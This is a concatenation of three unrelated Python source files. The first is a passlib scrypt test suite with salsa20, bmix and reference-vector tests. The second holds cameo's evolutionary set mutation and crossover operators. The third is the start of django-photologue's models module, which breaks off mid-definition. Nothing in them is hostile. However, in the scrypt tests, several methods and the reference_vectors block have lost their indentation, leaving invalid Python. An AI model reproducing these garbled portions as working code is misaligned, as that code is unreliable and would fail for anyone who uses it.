            engine = ScryptEngine(r=r, n=1 << rng.randint(1, 32), p=rng.randint(1, 1023))
            target = [rng.randint(0, 1 << 32) for _ in range((2 * r) * 16)]
            engine.bmix(input, target)
            self.assertEqual(target, list(output))
            # ScryptEngine special-cases bmix() for r=1.
            # this removes the special case patching, so we also test original bmix function.
            if r == 1:
                del engine.bmix
                target = [rng.randint(0, 1 << 32) for _ in range((2 * r) * 16)]
                engine.bmix(input, target)
                self.assertEqual(target, list(output))
        #-----------------------------------------------------------------------
        # test vector from (expired) scrypt rfc draft
        # (https://tools.ietf.org/html/draft-josefsson-scrypt-kdf-01, section 8)
        #-----------------------------------------------------------------------
        # NOTE: this pair corresponds to the first input & output pair
        #       from the test vector in test_smix(), above.
        # NOTE: original reference lists input & output as two separate 64 byte blocks.
        #       current internal representation used by bmix() uses single 2*r*16 array of uint32,
        #       combining all the B blocks into a single flat array.
        input = unpack_uint32_list(hb("""
            f7 ce 0b 65 3d 2d 72 a4 10 8c f5 ab e9 12 ff dd
            77 76 16 db bb 27 a7 0e 82 04 f3 ae 2d 0f 6f ad
            89 f6 8f 48 11 d1 e8 7b cc 3b d7 40 0a 9f fd 29
            09 4f 01 84 63 95 74 f3 9a e5 a1 31 52 17 bc d7
            89 49 91 44 72 13 bb 22 6c 25 b5 4d a8 63 70 fb
            cd 98 43 80 37 46 66 bb 8f fc b5 bf 40 c2 54 b0
            67 d2 7c 51 ce 4a d5 fe d8 29 c9 0b 50 5a 57 1b
            7f 4d 1c ad 6a 52 3c da 77 0e 67 bc ea af 7e 89
            """), 32)
        output = unpack_uint32_list(hb("""
            a4 1f 85 9c 66 08 cc 99 3b 81 ca cb 02 0c ef 05
            04 4b 21 81 a2 fd 33 7d fd 7b 1c 63 96 68 2f 29
            b4 39 31 68 e3 c9 e6 bc fe 6b c5 b7 a0 6d 96 ba
            e4 24 cc 10 2c 91 74 5c 24 ad 67 3d c7 61 8f 81
            20 ed c9 75 32 38 81 a8 05 40 f6 4c 16 2d cd 3c
            21 07 7c fe 5f 8d 5f e2 b1 a4 16 8f 95 36 78 b7
            7d 3b 3d 80 3b 60 e4 ab 92 09 96 e5 9b 4d 53 b6
            5d 2a 22 58 77 d5 ed f5 84 2c b9 f1 4e ef e4 25
            """), 32)
        # NOTE(review): the r=1 vector above is defined but never exercised --
        # the call below is commented out; confirm whether this was disabled
        # intentionally before re-enabling it.
        # check_bmix(1, input, output)
        #-----------------------------------------------------------------------
        # custom test vector for r=2
        # used to check for bmix() breakage while optimizing implementation.
        #-----------------------------------------------------------------------
        r = 2
        input = unpack_uint32_list(seed_bytes("bmix with r=2", 128 * r))
        output = unpack_uint32_list(hb("""
            ba240854954f4585f3d0573321f10beee96f12acdc1feb498131e40512934fd7
            43e8139c17d0743c89d09ac8c3582c273c60ab85db63e410d049a9e17a42c6a1
            6c7831b11bf370266afdaff997ae1286920dea1dedf0f4a1795ba710ba9017f1
            a374400766f13ebd8969362de2d153965e9941bdde0768fa5b53e8522f116ce0
            d14774afb88f46cd919cba4bc64af7fca0ecb8732d1fc2191e0d7d1b6475cb2e
            e3db789ee478d056c4eb6c6e28b99043602dbb8dfb60c6e048bf90719da8d57d
            3c42250e40ab79a1ada6aae9299b9790f767f54f388d024a1465b30cbbe9eb89
            002d4f5c215c4259fac4d083bac5fb0b47463747d568f40bb7fa87c42f0a1dc1
            """), 32 * r)
        check_bmix(r, input, output)
        #-----------------------------------------------------------------------
        # custom test vector for r=3
        # used to check for bmix() breakage while optimizing implementation.
        #-----------------------------------------------------------------------
        r = 3
        input = unpack_uint32_list(seed_bytes("bmix with r=3", 128 * r))
        output = unpack_uint32_list(hb("""
            11ddd8cf60c61f59a6e5b128239bdc77b464101312c88bd1ccf6be6e75461b29
            7370d4770c904d0b09c402573cf409bf2db47b91ba87d5a3de469df8fb7a003c
            95a66af96dbdd88beddc8df51a2f72a6f588d67e7926e9c2b676c875da13161e
            b6262adac39e6b3003e9a6fbc8c1a6ecf1e227c03bc0af3e5f8736c339b14f84
            c7ae5b89f5e16d0faf8983551165f4bb712d97e4f81426e6b78eb63892d3ff54
            80bf406c98e479496d0f76d23d728e67d2a3d2cdbc4a932be6db36dc37c60209
            a5ca76ca2d2979f995f73fe8182eefa1ce0ba0d4fc27d5b827cb8e67edd6552f
            00a5b3ab6b371bd985a158e728011314eb77f32ade619b3162d7b5078a19886c
            06f12bc8ae8afa46489e5b0239954d5216967c928982984101e4a88bae1f60ae
            3f8a456e169a8a1c7450e7955b8a13a202382ae19d41ce8ef8b6a15eeef569a7
            20f54c48e44cb5543dda032c1a50d5ddf2919030624978704eb8db0290052a1f
            5d88989b0ef931b6befcc09e9d5162320e71e80b89862de7e2f0b6c67229b93f
            """), 32 * r)
        check_bmix(r, input, output)
        #-----------------------------------------------------------------------
        # custom test vector for r=4
        # used to check for bmix() breakage while optimizing implementation.
        #-----------------------------------------------------------------------
        r = 4
        input = unpack_uint32_list(seed_bytes("bmix with r=4", 128 * r))
        output = unpack_uint32_list(hb("""
            803fcf7362702f30ef43250f20bc6b1b8925bf5c4a0f5a14bbfd90edce545997
            3047bd81655f72588ca93f5c2f4128adaea805e0705a35e14417101fdb1c498c
            33bec6f4e5950d66098da8469f3fe633f9a17617c0ea21275185697c0e4608f7
            e6b38b7ec71704a810424637e2c296ca30d9cbf8172a71a266e0393deccf98eb
            abc430d5f144eb0805308c38522f2973b7b6a48498851e4c762874497da76b88
            b769b471fbfc144c0e8e859b2b3f5a11f51604d268c8fd28db55dff79832741a
            1ac0dfdaff10f0ada0d93d3b1f13062e4107c640c51df05f4110bdda15f51b53
            3a75bfe56489a6d8463440c78fb8c0794135e38591bdc5fa6cec96a124178a4a
            d1a976e985bfe13d2b4af51bd0fc36dd4cfc3af08efe033b2323a235205dc43d
            e57778a492153f9527338b3f6f5493a03d8015cd69737ee5096ad4cbe660b10f
            b75b1595ddc96e3748f5c9f61fba1ef1f0c51b6ceef8bbfcc34b46088652e6f7
            edab61521cbad6e69b77be30c9c97ea04a4af359dafc205c7878cc9a6c5d122f
            8d77f3cbe65ab14c3c491ef94ecb3f5d2c2dd13027ea4c3606262bb3c9ce46e7
            dc424729dc75f6e8f06096c0ad8ad4d549c42f0cad9b33cb95d10fb3cadba27c
            5f4bf0c1ac677c23ba23b64f56afc3546e62d96f96b58d7afc5029f8168cbab4
            533fd29fc83c8d2a32b81923992e4938281334e0c3694f0ee56f8ff7df7dc4ae
            """), 32 * r)
        check_bmix(r, input, output)
    def test_salsa(self):
        """salsa20() -- reference vector plus a custom regression vector"""
        from passlib.crypto.scrypt._builtin import salsa20
        # NOTE: salsa20() currently operates on lists of 16 uint32 elements,
        #       which is what unpack_uint32_list(hb(...)) produces below.
        #-----------------------------------------------------------------------
        # test vector from (expired) scrypt rfc draft
        # (https://tools.ietf.org/html/draft-josefsson-scrypt-kdf-01, section 7)
        #-----------------------------------------------------------------------
        # NOTE: this pair corresponds to the first input & output pair
        #       from the test vector in test_bmix(), above.
        input = unpack_uint32_list(hb("""
            7e 87 9a 21 4f 3e c9 86 7c a9 40 e6 41 71 8f 26
            ba ee 55 5b 8c 61 c1 b5 0d f8 46 11 6d cd 3b 1d
            ee 24 f3 19 df 9b 3d 85 14 12 1e 4b 5a c5 aa 32
            76 02 1d 29 09 c7 48 29 ed eb c6 8d b8 b8 c2 5e
            """))
        output = unpack_uint32_list(hb("""
            a4 1f 85 9c 66 08 cc 99 3b 81 ca cb 02 0c ef 05
            04 4b 21 81 a2 fd 33 7d fd 7b 1c 63 96 68 2f 29
            b4 39 31 68 e3 c9 e6 bc fe 6b c5 b7 a0 6d 96 ba
            e4 24 cc 10 2c 91 74 5c 24 ad 67 3d c7 61 8f 81
            """))
        self.assertEqual(salsa20(input), output)
        #-----------------------------------------------------------------------
        # custom test vector,
        # used to check for salsa20() breakage while optimizing _gen_files output.
        #-----------------------------------------------------------------------
        input = list(range(16))
        output = unpack_uint32_list(hb("""
            f518dd4fb98883e0a87954c05cab867083bb8808552810752285a05822f56c16
            9d4a2a0fd2142523d758c60b36411b682d53860514b871d27659042a5afa475d
            """))
        self.assertEqual(salsa20(input), output)
#=============================================================================
# eof
#=============================================================================
#=============================================================================
# test scrypt
#=============================================================================
class _CommonScryptTest(TestCase):
"""
base class for testing various scrypt backends against same set of reference vectors.
"""
#=============================================================================
# class attrs
#=============================================================================
    @classproperty
    def descriptionPrefix(cls):
        # interpolate the backend name so each subclass reports which
        # scrypt implementation it is exercising
        return "passlib.utils.scrypt.scrypt() <%s backend>" % cls.backend
    # name of the scrypt backend under test; subclasses must override this
    backend = None
#=============================================================================
# setup
#=============================================================================
    def setUp(self):
        """Activate the backend under test before each test runs."""
        # subclasses must have set `backend`, otherwise the suite is invalid
        assert self.backend
        scrypt_mod._set_backend(self.backend)
        super(_CommonScryptTest, self).setUp()
#=============================================================================
# reference vectors
#=============================================================================
reference_vectors = [
# entry format: (secret, salt, n, r, p, keylen, result)
#------------------------------------------------------------------------
# test vectors from scrypt whitepaper --
# http://www.tarsnap.com/scrypt/scrypt.pdf, appendix b
#
# also present in (expired) scrypt rfc draft --
# https://tools.ietf.org/html/draft-josefsson-scrypt-kdf-01, section 11
#------------------------------------------------------------------------
("", "", 16, 1, 1, 64, hb("""
77 d6 57 62 38 65 7b 20 3b 19 ca 42 c1 8a 04 97
f1 6b 48 44 e3 07 4a e8 df df fa 3f ed e2 14 42
fc d0 06 9d ed 09 48 f8 32 6a 75 3a 0f c8 1f 17
e8 d3 e0 fb 2e 0d 36 28 cf 35 e2 0c 38 d1 89 06
""")),
("password", "NaCl", 1024, 8, 16, 64, hb("""
fd ba be 1c 9d 34 72 00 78 56 e7 19 0d 01 e9 fe
7c 6a d7 cb c8 23 78 30 e7 73 76 63 4b 37 31 62
2e af 30 d9 2e 22 a3 88 6f f1 09 27 9d 98 30 da
c7 27 af b9 4a 83 ee 6d 83 60 cb df a2 cc 06 40
""")),
# NOTE: the following are skipped for all backends unless TEST_MODE="full"
("pleaseletmein", "SodiumChloride", 16384, 8, 1, 64, hb("""
70 23 bd cb 3a fd 73 48 46 1c 06 cd 81 fd 38 eb
fd a8 fb ba 90 4f 8e 3e a9 b5 43 f6 54 5d a1 f2
d5 43 29 55 61 3f 0f cf 62 d4 97 05 24 2a 9a f9
e6 1e 85 dc 0d 65 1e 40 df cf 01 7b 45 57 58 87
""")),
# NOTE: the following are always skipped for the builtin backend,
# (just takes too long to be worth it)
("pleaseletmein", "SodiumChloride", 1048576, 8, 1, 64, hb("""
21 01 cb 9b 6a 51 1a ae ad db be 09 cf 70 f8 81
ec 56 8d 57 4a 2f fd 4d ab e5 ee 98 20 ad aa 47
8e 56 fd 8f 4b a5 d0 9f fa 1c 6d 92 7c 40 f4 c3
37 30 40 49 e8 a9 52 fb cb f4 5c 6f a7 7a 41 a4
""")),
]
    def test_reference_vectors(self):
        """reference vectors -- run the current backend against each entry"""
        for secret, salt, n, r, p, keylen, result in self.reference_vectors:
            if n >= 1024 and TEST_MODE(max="default"):
                # skip large values unless we're running full test suite
                continue
            if n > 16384 and self.backend == "builtin":
                # skip largest vector for builtin, takes WAAY too long
                # (46s under pypy, ~5m under cpython)
                continue
            log.debug("scrypt reference vector: %r %r n=%r r=%r p=%r", secret, salt, n, r, p)
            self.assertEqual(scrypt_mod.scrypt(secret, salt, n, r, p, keylen), result)
#=============================================================================
# fuzz testing
#=============================================================================
_already_tested_others = None
def test_other_backends(self):
"""compare output to other backends"""
# only run once, since test is symetric.
# maybe this means it should go somewhere else?
if self._already_tested_others:
raise self.skipTest("already run under %r backend test" % self._already_tested_others)
self._already_tested_others = self.backend
rng = self.getRandom()
# get available backends
orig = scrypt_mod.backend
available = set(name for name in scrypt_mod.backend_values
if scrypt_mod._has_backend(name))
scrypt_mod._set_backend(orig)
available.discard(self.backend)
if not available:
raise self.skipTest("no other backends found")
warnings.filterwarnings("ignore", "(?i)using builtin scrypt backend",
category=exc.PasslibSecurityWarning)
# generate some random options, and cross-check output
for _ in range(10):
# NOTE: keeping values low due to builtin test
secret = getrandbytes(rng, rng.randint(0, 64))
salt = getrandbytes(rng, rng.randint(0, 64))
n = 1 << rng.randint(1, 10)
r = rng.randint(1, 8)
p = rng.randint(1, 3)
ks = rng.randint(1, 64)
previous = None
backends = set()
for name in available:
scrypt_mod._set_backend(name)
self.assertNotIn(scrypt_mod._scrypt, backends)
backends.add(scrypt_mod._scrypt)
result = hexstr(scrypt_mod.scrypt(secret, salt, n, r, p, ks))
self.assertEqual(len(result), 2*ks)
if previous is not None:
self.assertEqual(result, previous,
msg="%r output differs from others %r: %r" %
(name, available, [secret, salt, n, r, p, ks]))
#=============================================================================
# test input types
#=============================================================================
    def test_backend(self):
        """backend management -- clobbering, reloading, unknown names"""
        # clobber backend
        scrypt_mod.backend = None
        scrypt_mod._scrypt = None
        # calling scrypt with no backend loaded must fail loudly
        self.assertRaises(TypeError, scrypt_mod.scrypt, 's', 's', 2, 2, 2, 16)
        # reload backend
        scrypt_mod._set_backend(self.backend)
        self.assertEqual(scrypt_mod.backend, self.backend)
        scrypt_mod.scrypt('s', 's', 2, 2, 2, 16)
        # throw error for unknown backend
        self.assertRaises(ValueError, scrypt_mod._set_backend, 'xxx')
        # a failed switch must leave the previous backend active
        self.assertEqual(scrypt_mod.backend, self.backend)
def test_secret_param(self):
"""'secret' parameter"""
def run_scrypt(secret):
return hexstr(scrypt_mod.scrypt(secret, "salt", 2, 2, 2, 16))
# unicode
TEXT = u("abc\u00defg")
self.assertEqual(run_scrypt(TEXT), '05717106997bfe0da42cf4779a2f8bd8')
# utf8 bytes
TEXT_UTF8 = b'abc\xc3\x9efg'
self.assertEqual(run_scrypt(TEXT_UTF8), '05717106997bfe0da42cf4779a2f8bd8')
# latin1 bytes
TEXT_LATIN1 = b'abc\xdefg'
self.assertEqual(run_scrypt(TEXT_LATIN1), '770825d10eeaaeaf98e8a3c40f9f441d')
# accept empty string
self.assertEqual(run_scrypt(""), 'ca1399e5fae5d3b9578dcd2b1faff6e2')
# reject other types
self.assertRaises(TypeError, run_scrypt, None)
self.assertRaises(TypeError, run_scrypt, 1)
    def test_salt_param(self):
        """'salt' parameter"""
        # helper: fixed secret/params, vary only the salt
        def run_scrypt(salt):
            return hexstr(scrypt_mod.scrypt("secret", salt, 2, 2, 2, 16))
        # unicode
        TEXT = u("abc\u00defg")
        self.assertEqual(run_scrypt(TEXT), 'a748ec0f4613929e9e5f03d1ab741d88')
        # utf8 bytes -- same digest as the unicode form (salt is utf-8 encoded)
        TEXT_UTF8 = b'abc\xc3\x9efg'
        self.assertEqual(run_scrypt(TEXT_UTF8), 'a748ec0f4613929e9e5f03d1ab741d88')
        # latin1 bytes -- different raw bytes, so a different digest
        TEXT_LATIN1 = b'abc\xdefg'
        self.assertEqual(run_scrypt(TEXT_LATIN1), '91d056fb76fb6e9a7d1cdfffc0a16cd1')
        # reject other types
        self.assertRaises(TypeError, run_scrypt, None)
        self.assertRaises(TypeError, run_scrypt, 1)
    def test_n_param(self):
        """'n' (rounds) parameter"""
        # helper: fixed secret/salt, vary only n
        def run_scrypt(n):
            return hexstr(scrypt_mod.scrypt("secret", "salt", n, 2, 2, 16))
        # must be > 1, and a power of 2
        self.assertRaises(ValueError, run_scrypt, -1)
        self.assertRaises(ValueError, run_scrypt, 0)
        self.assertRaises(ValueError, run_scrypt, 1)
        self.assertEqual(run_scrypt(2), 'dacf2bca255e2870e6636fa8c8957a66')
        # non-powers of 2 are rejected
        self.assertRaises(ValueError, run_scrypt, 3)
        self.assertRaises(ValueError, run_scrypt, 15)
        self.assertEqual(run_scrypt(16), '0272b8fc72bc54b1159340ed99425233')
def test_r_param(self):
"""'r' (block size) parameter"""
def run_scrypt(r, n=2, p=2):
return hexstr(scrypt_mod.scrypt("secret", "salt", n, r, p, 16))
# must be > 1
self.assertRaises(ValueError, run_scrypt, -1)
self.assertRaises(ValueError, run_scrypt, 0)
self.assertEqual(run_scrypt(1), '3d630447d9f065363b8a79b0b3670251')
self.assertEqual(run_scrypt(2), 'dacf2bca255e2870e6636fa8c8957a66')
self.assertEqual(run_scrypt(5), '114f05e985a903c27237b5578e763736')
# reject r*p >= 2**30
self.assertRaises(ValueError, run_scrypt, (1<<30), p=1)
self.assertRaises(ValueError, run_scrypt, (1<<30) / 2, p=2)
def test_p_param(self):
"""'p' (parallelism) parameter"""
def run_scrypt(p, n=2, r=2):
return hexstr(scrypt_mod.scrypt("secret", "salt", n, r, p, 16))
# must be > 1
self.assertRaises(ValueError, run_scrypt, -1)
self.assertRaises(ValueError, run_scrypt, 0)
self.assertEqual(run_scrypt(1), 'f2960ea8b7d48231fcec1b89b784a6fa')
self.assertEqual(run_scrypt(2), 'dacf2bca255e2870e6636fa8c8957a66')
self.assertEqual(run_scrypt(5), '848a0eeb2b3543e7f543844d6ca79782')
# reject r*p >= 2**30
self.assertRaises(ValueError, run_scrypt, (1<<30), r=1)
self.assertRaises(ValueError, run_scrypt, (1<<30) / 2, r=2)
def test_keylen_param(self):
"""'keylen' parameter"""
rng = self.getRandom()
def run_scrypt(keylen):
return hexstr(scrypt_mod.scrypt("secret", "salt", 2, 2, 2, keylen))
# must be > 0
self.assertRaises(ValueError, run_scrypt, -1)
self.assertRaises(ValueError, run_scrypt, 0)
self.assertEqual(run_scrypt(1), 'da')
# pick random value
ksize = rng.randint(0, 1 << 10)
self.assertEqual(len(run_scrypt(ksize)), 2*ksize) # 2 hex chars per output
# one more than upper bound
self.assertRaises(ValueError, run_scrypt, ((2**32) - 1) * 32 + 1)
#=============================================================================
# eoc
#=============================================================================
# NOTE: builtin version runs VERY slow (except under PyPy, where it's only 11x slower),
# so skipping under quick test mode.
@skipUnless(PYPY or TEST_MODE(min="default"), "skipped under current test mode")
class BuiltinScryptTest(_CommonScryptTest):
    """run the common scrypt suite against the pure-python builtin backend"""
    backend = "builtin"

    def setUp(self):
        super(BuiltinScryptTest, self).setUp()
        # the builtin backend emits a security warning about being slow;
        # silence it for the duration of the suite.
        warnings.filterwarnings("ignore", "(?i)using builtin scrypt backend",
                                category=exc.PasslibSecurityWarning)

    def test_missing_backend(self):
        """backend management -- missing backend"""
        # only meaningful when the optional 'scrypt' package is absent
        if _can_import_scrypt():
            raise self.skipTest("'scrypt' backend is present")
        self.assertRaises(exc.MissingBackendError, scrypt_mod._set_backend, 'scrypt')
def _can_import_scrypt():
"""check if scrypt package is importable"""
try:
import scrypt
except ImportError as err:
if "scrypt" in str(err):
return False
raise
return True
@skipUnless(_can_import_scrypt(), "'scrypt' package not found")
class ScryptPackageTest(_CommonScryptTest):
    """run the common scrypt suite against the 'scrypt' PyPI package backend"""
    backend = "scrypt"

    def test_default_backend(self):
        """backend management -- default backend"""
        # when the scrypt package is installed, "default" should resolve to it
        scrypt_mod._set_backend("default")
        self.assertEqual(scrypt_mod.backend, "scrypt")
#=============================================================================
# eof
#=============================================================================
|
# Copyright 2014 Novo Nordisk Foundation Center for Biosustainability, DTU.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from inspyred.ec.variators import mutator, crossover
from ordered_set import OrderedSet
from cameo.strain_design.heuristic.evolutionary.genomes import MultipleChromosomeGenome
from numpy import float32 as float
import logging
__all__ = ['set_mutation', 'set_indel']
logger = logging.getLogger(__name__)
def _subtract(list_a, list_b):
return [v for v in list_a if v not in list_b]
def _do_set_n_point_crossover(representation, mom, dad, points, random, max_size):
    """Split *representation* at *points* and alternately exchange segments
    between the two parents, producing two children (bro, sis)."""
    # cut the (sorted) representation into contiguous segments
    chunks = []
    i = 0
    for point in points:
        chunks.append(representation[i:point])
        i = point
    chunks.append(representation[i:])
    bro = OrderedSet()
    sis = OrderedSet()
    # `cross` flips after every segment, so the parents alternate which
    # child inherits their genes segment by segment.
    cross = True
    for variables in chunks:
        for v in variables:
            if v in mom:
                bro.append(v) if cross else sis.append(v)
            if v in dad:
                sis.append(v) if cross else bro.append(v)
        cross = not cross
    # trim oversized children back down to max_size at random
    # NOTE(review): random.sample returns a plain list here, not an
    # OrderedSet -- presumably fine for callers, confirm.
    if len(bro) > max_size:
        bro = random.sample(bro, max_size)
    if len(sis) > max_size:
        sis = random.sample(sis, max_size)
    return bro, sis
@crossover
def set_n_point_crossover(random, mom, dad, args):
    """N-point crossover for set-encoded individuals.

    The combined, sorted gene pool of both parents is cut at
    ``num_crossover_points`` random positions and the segments are
    distributed alternately between two children.
    """
    representation = sorted(set(mom).union(set(dad)))
    crossover_rate = args.get('crossover_rate', 1.0)
    num_crossover_points = args.get('num_crossover_points', 1)
    max_size = args.get('max_size', 9)
    children = []
    if random.random() <= crossover_rate:
        points = random.sample(representation, num_crossover_points)
        bro, sis = _do_set_n_point_crossover(representation, mom, dad, points, random, max_size)
        # ensure number of knockouts > 0 or do not add individual
        if len(bro) > 0:
            children.append(bro)
        if len(sis) > 0:
            children.append(sis)
    else:
        # no crossover this round: parents pass through unchanged
        children.append(mom)
        children.append(dad)
    assert all(0 < len(individual) <= max_size for individual in children)
    return children
@mutator
def set_mutation(random, individual, args):
    """
    Mutates a given set based on the entries available on the representation.

    Each value in the individual is replaced, with probability
    ``mutation_rate``, by a randomly chosen index that is not yet used.

    Parameters
    ----------
    random: Random
    individual: list
        with unique integers
    args: dict
        must contain the representation

    Returns
    -------
    list
        created based on an ordered set
    """
    representation = args.get('representation')
    mutation_rate = float(args.get('mutation_rate', .1))
    # candidate replacements: every index not already in the individual
    free_indices = _subtract(range(len(representation)), individual)
    mutated = []
    for value in individual:
        roll = random.random()
        if roll < mutation_rate and len(free_indices) > 0:
            replacement = random.sample(free_indices, 1)[0]
            free_indices.remove(replacement)
            mutated.append(replacement)
        else:
            mutated.append(value)
    assert len(individual) == len(mutated)
    return sorted(mutated)
@mutator
def set_indel(random, individual, args):
    """
    Creates a random insertion or deletion in the individual.

    With probability ``indel_rate`` a coin flip decides between inserting a
    new, unused index (if there is room) and deleting a random element
    (if more than one remains).

    Parameters
    ----------
    random: Random
    individual: list
        with unique integers
    args: dict
        must contain the representation

    Returns
    -------
    list
        created based on an ordered set
    """
    if not args.get("variable_size", True):
        # fixed-size genomes: indels are disabled, return an unchanged copy
        return list(individual)
    max_size = args.get("max_size", 9)
    representation = args.get('representation')
    free_indices = _subtract(range(len(representation)), individual)
    indel_rate = float(args.get('indel_rate', .1))
    result = list(individual)
    if random.random() < indel_rate:
        logger.info("Applying indel mutation")
        grow = random.random() > 0.5
        if grow and len(result) < max_size and len(free_indices) > 0:
            addition = random.sample(free_indices, 1)[0]
            free_indices.remove(addition)
            result.append(addition)
        elif len(result) > 1:
            # deletion: keep a random subset one element smaller
            result = random.sample(result, len(result) - 1)
    assert 0 < len(result) <= max_size
    return sorted(result)
@mutator
def multiple_chromosome_set_mutation(random, individual, args):
    """
    Mutates a given set based on the entries available on the representation.
    Parameters
    ----------
    random: Random
    individual: MultipleChromosomeGenome
        with unique integers in each chromosome
    args: dict
        must contain the representation of each chromosome
    Returns
    -------
    MultipleChromosomeGenome
        A mutated individual
    """
    new_individual = MultipleChromosomeGenome(keys=individual.keys)
    # each chromosome is mutated independently, with its own representation
    # and mutation rate looked up by key
    for key in individual.keys:
        representation = args.get('%s_representation' % key)
        indices = range(len(representation))
        indices = _subtract(indices, individual[key])  # remove indices already present in the individual
        # NOTE(review): unlike set_mutation, the rate is not coerced with
        # float() here -- fine for the numeric default; confirm callers never
        # pass it as a string.
        mutation_rate = args.get('%s_mutation_rate' % key, .1)
        for value in individual[key]:
            if random.random() < mutation_rate and len(indices) > 0:
                index = random.sample(indices, 1)[0]
                indices.remove(index)
                new_individual[key].append(index)
            else:
                new_individual[key].append(value)
        assert len(new_individual[key]) == len(individual[key])
        new_individual[key] = sorted(new_individual[key])
    return new_individual
@mutator
def multiple_chromosome_set_indel(random, individual, args):
    """
    Creates a random insertion or deletion in the individual.
    Parameters
    ----------
    random: Random
    individual: MultipleChromosomeGenome
        with unique integers in each chromosome
    args: dict
        must contain the representation of each chromosome
    Returns
    -------
    MultipleChromosomeGenome
        A mutated individual
    """
    new_individual = individual.copy()
    max_size = args.get("max_size", 9)
    # each chromosome gets an independent chance of an insertion/deletion
    for key in individual.keys:
        representation = args.get('%s_representation' % key)
        indices = range(len(representation))
        indices = _subtract(indices, individual[key])  # remove indices already present in the individual
        indel_rate = args.get('%s_indel_rate' % key, .1)
        if random.random() < indel_rate:
            # coin flip: insert a new unused index if there's room,
            # otherwise delete one element (never below one element)
            if random.random() > 0.5 and len(new_individual[key]) < max_size and len(indices) > 0:
                index = random.sample(indices, 1)[0]
                indices.remove(index)
                new_individual[key].append(index)
            else:
                # NOTE(review): the guard reads individual[key] but samples
                # new_individual[key]; equivalent here since the copy is
                # untouched at this point, but fragile if the code above changes.
                if len(individual[key]) > 1:
                    new_individual[key] = random.sample(new_individual[key], len(new_individual[key]) - 1)
        assert len(new_individual[key]) <= max_size
        new_individual[key] = sorted(new_individual[key])
    return new_individual
@crossover
def multiple_chromosome_n_point_crossover(random, mom, dad, args):
    """Apply set_n_point_crossover independently to each chromosome."""
    # NOTE(review): set_n_point_crossover is itself wrapped by @crossover, so
    # this call returns a *list* of child sets which is stored whole under
    # children[key]; confirm downstream code expects that nesting.
    children = MultipleChromosomeGenome(keys=mom.keys)
    for key in children.keys:
        children[key] = set_n_point_crossover(random, [mom[key], dad[key]], args)
    return children
|
<gh_stars>100-1000
import logging
import os
import random
import unicodedata
from datetime import datetime
from functools import partial
from importlib import import_module
from inspect import isclass
from io import BytesIO
import exifread
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.exceptions import ValidationError
from django.core.files.base import ContentFile
from django.core.files.storage import default_storage
from django.core.validators import RegexValidator
from django.db import models
from django.db.models.signals import post_save
from django.template.defaultfilters import slugify
from django.urls import reverse
from django.utils.encoding import filepath_to_uri, force_str, smart_str
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from django.utils.translation import gettext_lazy as _
from PIL import Image, ImageEnhance, ImageFile, ImageFilter
from sortedm2m.fields import SortedManyToManyField
from .managers import GalleryQuerySet, PhotoQuerySet
from .utils.reflection import add_reflection
from .utils.watermark import apply_watermark
logger = logging.getLogger('photologue.models')
# Default limit for gallery.latest
LATEST_LIMIT = getattr(settings, 'PHOTOLOGUE_GALLERY_LATEST_LIMIT', None)
# Number of random images from the gallery to display.
SAMPLE_SIZE = getattr(settings, 'PHOTOLOGUE_GALLERY_SAMPLE_SIZE', 5)
# max_length setting for the ImageModel ImageField
IMAGE_FIELD_MAX_LENGTH = getattr(settings, 'PHOTOLOGUE_IMAGE_FIELD_MAX_LENGTH', 100)
# Path to sample image
SAMPLE_IMAGE_PATH = getattr(settings, 'PHOTOLOGUE_SAMPLE_IMAGE_PATH', os.path.join(
os.path.dirname(__file__), 'res', 'sample.jpg'))
# Modify image file buffer size.
ImageFile.MAXBLOCK = getattr(settings, 'PHOTOLOGUE_MAXBLOCK', 256 * 2 ** 10)
# Photologue image path relative to media root
PHOTOLOGUE_DIR = getattr(settings, 'PHOTOLOGUE_DIR', 'photologue')
# Look for user function to define file paths
PHOTOLOGUE_PATH = getattr(settings, 'PHOTOLOGUE_PATH', None)
if PHOTOLOGUE_PATH is not None:
    # The project supplied its own upload-path strategy: either a callable,
    # or a dotted path "package.module.function" to import at startup.
    if callable(PHOTOLOGUE_PATH):
        get_storage_path = PHOTOLOGUE_PATH
    else:
        parts = PHOTOLOGUE_PATH.split('.')
        module_name = '.'.join(parts[:-1])
        module = import_module(module_name)
        get_storage_path = getattr(module, parts[-1])
else:
    # Default: store under PHOTOLOGUE_DIR/photos/ with the filename reduced
    # to plain ASCII (accents stripped via NFKD normalization).
    def get_storage_path(instance, filename):
        fn = unicodedata.normalize('NFKD', force_str(filename)).encode('ascii', 'ignore').decode('ascii')
        return os.path.join(PHOTOLOGUE_DIR, 'photos', fn)
# Support CACHEDIR.TAG spec for backups for ignoring cache dir.
# See http://www.brynosaurus.com/cachedir/spec.html
PHOTOLOGUE_CACHEDIRTAG = os.path.join(PHOTOLOGUE_DIR, "photos", "cache", "CACHEDIR.TAG")
# NOTE(review): this touches the storage backend at import time -- a remote
# storage outage would make the module unimportable; confirm that's acceptable.
if not default_storage.exists(PHOTOLOGUE_CACHEDIRTAG):
    default_storage.save(PHOTOLOGUE_CACHEDIRTAG, ContentFile(
        b"Signature: 8a477f597d28d172789f06886806bc55"))
# Exif Orientation values
# Value 0thRow 0thColumn
# 1 top left
# 2 top right
# 3 bottom right
# 4 bottom left
# 5 left top
# 6 right top
# 7 right bottom
# 8 left bottom
# Image Orientations (according to EXIF informations) that needs to be
# transposed and appropriate action
IMAGE_EXIF_ORIENTATION_MAP = {
2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
6: Image.ROTATE_270,
8: Image.ROTATE_90,
}
# Quality options for JPEG images
JPEG_QUALITY_CHOICES = (
(30, _('Very Low')),
(40, _('Low')),
(50, _('Medium-Low')),
(60, _('Medium')),
(70, _('Medium-High')),
(80, _('High')),
(90, _('Very High')),
)
# choices for new crop_anchor field in Photo
CROP_ANCHOR_CHOICES = (
('top', _('Top')),
('right', _('Right')),
('bottom', _('Bottom')),
('left', _('Left')),
('center', _('Center (Default)')),
)
IMAGE_TRANSPOSE_CHOICES = (
('FLIP_LEFT_RIGHT', _('Flip left to right')),
